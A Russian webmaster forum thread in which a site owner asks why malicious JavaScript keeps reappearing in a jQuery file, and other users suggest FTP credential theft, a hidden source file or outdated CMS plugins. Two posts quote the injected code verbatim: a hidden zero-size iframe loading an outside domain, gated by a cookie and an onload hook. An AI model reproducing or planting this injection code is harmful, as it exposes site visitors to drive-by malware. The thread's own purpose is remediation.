X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Постоянно прописывается вирус в файле
Intersect
Intersect
Topic Starter сообщение 28.8.2013, 2:03; Ответить: Intersect
Сообщение #1


I am the Intersect
*****

Группа: Active User
Сообщений: 934
Регистрация: 24.1.2011
Из: Киев
Поблагодарили: 187 раз
Репутация:   51  


Здравствуйте, постоянно прописываются разнообразные вирусы в файле: /engine/classes/js/jquery.js

удаляю уже раз так 5-тый

всегда кода разные, на этот раз: var if4RVLf = document.createElement('iframe');if4RVLf.name = 'if4RVLf';if4RVLf.src = 'http://retopen.9stud.io/';

что делать, может права к папке ограничить, подскажите?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 28.8.2013, 8:21; Ответить: kagtus
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


взлом не понятный, смена прав не помогает, надо логи анализировать...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Ultrastalker
Ultrastalker
сообщение 28.8.2013, 8:51; Ответить: Ultrastalker
Сообщение #3


Участник
***

Группа: User
Сообщений: 102
Регистрация: 2.7.2013
Из: Россия, Москва
Поблагодарили: 38 раз
Репутация:   7  


Intersect, как вариант рекомендую (при наличии на вашем компьютере заранее заданного FTP-доступа) изменить к нему пароль на заведомо неверный, добавив к нему несколько любых лишних символов в начале и (или) в конце и в дальнейшем при каждом подключении после запроса о перевводе пароля удалять из последнего лишние символы. Основание совета: вирусняки, портящие js-файлы, частенько прописываются на локальном компьютере и ищут доступные FTP-подключения, которыми и пользуются для поиска уже на сервере js-скриптов (но не только их), с целью их перезаписи.


--------------------
Коллекция аватаров из кинофильмов и мультфильмов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 8:55; Ответить: mmkulikov
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 2031
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


(Intersect @ 28.8.2013, 0:03) *
/engine/classes/js/jquery.js

Какие права выставлены на этот файл?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 28.8.2013, 9:40; Ответить: seomasters
Сообщение #5


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


Да просто основной вирус в другом файле, и он прописывает в этот фаил то что вы удаляете уже в 5й раз. Ищите источник.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
viston
viston
сообщение 28.8.2013, 10:38; Ответить: viston
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 19.1.2010
Из: Приморский край город Уссурийск
Поблагодарили: 98 раз
Репутация:   16  


Ну да скорей вирус в другой папке , все файлы проверите . У меня было такое на хостинге 15 сайтов было все почистил уже с пол года как проблем небыло.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MorKer
MorKer
сообщение 28.8.2013, 11:26; Ответить: MorKer
Сообщение #7


Участник
***

Группа: User
Сообщений: 220
Регистрация: 5.6.2009
Поблагодарили: 165 раз
Репутация:   63  


(Intersect @ 28.8.2013, 1:03) *
разнообразные вирусы в файле

Владелец файла apache?

(Intersect @ 28.8.2013, 1:03) *
что делать

Произвести стандартные действия:
1. Обновить cms.
2. Удалить модули и плагины сомнительного происхождения. Модули и плагины из надежных источников обновить до последних версий.
3. Скачать сайт на локальный ПК и проверить антивирусом.

Сайт должен работать на последней версии cms, скачанной с официального сайта. Аналогичное требование к плагинами и модулями.

Вы видимо либо не обновили своевременно cms, либо установили модули/плагины сомнительного происхождения. Вот и получили регулярные взломы.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Intersect
Intersect
Topic Starter сообщение 28.8.2013, 21:42; Ответить: Intersect
Сообщение #8


I am the Intersect
*****

Группа: Active User
Сообщений: 934
Регистрация: 24.1.2011
Из: Киев
Поблагодарили: 187 раз
Репутация:   51  


(mmkulikov @ 28.8.2013, 7:55) *
/js/jquery.js
Какие права выставлены на этот файл?

стоит 755

эмм..всем спасибо за версии, попробуем что-то исправить))


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prostohost
prostohost
сообщение 30.8.2013, 8:50; Ответить: prostohost
Сообщение #9


Участник
***

Группа: User
Сообщений: 126
Регистрация: 2.3.2009
Поблагодарили: 5 раз
Репутация:   -2  


Вы ищите совета или человека который решит проблему?
Если последнее - то пишите в ЛС.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
montrey
montrey
сообщение 30.8.2013, 9:06; Ответить: montrey
Сообщение #10


Новичок
*

Группа: Viewer
Сообщений: 4
Регистрация: 10.8.2011
Поблагодарили: 0 раз
Репутация:   0  


(Intersect @ 28.8.2013, 2:03) *
Здравствуйте, постоянно прописываются разнообразные вирусы в файле: /engine/classes/js/jquery.js

Такая же проблема 4 аккаунта на хостинге, на всех сайтах код приведенный ниже, причем cms сайта не имеет значения, заражает все сайты . Причем дата изменения должна быть в этом месяце, но показывает дату изменения 2011-2012 год, хотя есть сайты которые пару месяцев назад залил.
;var ifstOB = document.createElement('iframe');ifstOB.name = 'ifstOB';ifstOB.src = 'http://asurt.toutges.com/';ifstOB.style.width = '0px';ifstOB.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifstOB=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifstOB);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'ifstOB=yes; path=/; expires=' + expiresDate;}};


(Ultrastalker @ 28.8.2013, 8:51) *
как вариант рекомендую (при наличии на вашем компьютере заранее заданного FTP-доступа) изменить к нему пароль на заведомо неверный, добавив к нему несколько любых лишних символов в начале и (или) в конце и в дальнейшем при каждом подключении после запроса о перевводе пароля удалять из последнего лишние символы. Основание совета: вирусняки, портящие js-файлы, частенько прописываются на локальном компьютере и ищут доступные FTP-подключения, которыми и пользуются для поиска уже на сервере js-скриптов (но не только их), с целью их перезаписи.

Какой уровень доступа надо иметь, чтобы не затрагивать дату изменения? либо дату изменения ставить 2011-2012 год?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вирус на службе маркетинга
2 jack 644 9.10.2017, 19:33
автор: jack
Открытая тема (нет новых ответов) В файле robots.txt сайта задана противоречивая директива Host
5 RMak 1194 26.9.2017, 13:16
автор: kstnews
Открытая тема (нет новых ответов) На постоянно нужен копирайтер/рерайтер для наполнения автомобильного сайта.
Наполнение сайта автомобильной тематики новостями.
4 N_73 884 13.8.2017, 1:12
автор: Arwis
Открытая тема (нет новых ответов) Постоянно меняю QIWI на WMR
QIWI с меня, WMR с вас
24 Nevskiy 4457 23.10.2016, 10:32
автор: Nevskiy
Открытая тема (нет новых ответов) Постоянно покупаю ссылки и места под статьи для интим магазина (секс шоп)
5 mirintima 1441 21.9.2016, 18:27
автор: garri1984


 



RSS Текстовая версия Сейчас: 17.12.2017, 2:38
Дизайн